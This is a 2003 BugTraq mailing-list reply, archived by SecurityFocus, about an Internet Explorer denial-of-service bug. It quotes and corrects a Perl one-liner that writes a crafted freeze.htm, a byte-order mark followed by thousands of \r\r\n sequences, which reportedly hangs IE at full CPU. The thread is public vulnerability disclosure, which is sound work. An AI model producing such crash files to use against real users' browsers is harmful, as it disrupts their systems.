BugTraq
Re: April appeared to be a month of IE bugs. Here's another one. May 01 2003 01:26AM
ERRor (error pochtamt ru) (1 replies)
> >Hello, Bugtraq.
>
> >Malicious htm file can freeze IE with 100% CPU usage:
> >Construct the file freeze.htm:
> >c:\>perl -e "print qq'\xFF\xFE'; print qq'\r\n' x 30000" > freeze.htm
>
This string works only with Active Perl, in unix-like Perl versions exploit
string is:
perl -e "print qq'\xFF\xFE'; print qq'\r\r\n' x 30000" > freeze.htm
Active Perl understand \n = \x0D\x0A, freeze of IE exist only if sequence
of bytes will be ...\x0D\x0D\x0A...
Sorry, I have not noticed it at once.

Best Regards, ERRor, dHtm.

[ reply ]
Re: April appeared to be a month of IE bugs. Here's another one. May 02 2003 08:11AM
Joachim Stro"mbergson (Joachim Strombergson InformAsic com)


 

Privacy Statement
Copyright 2010, SecurityFocus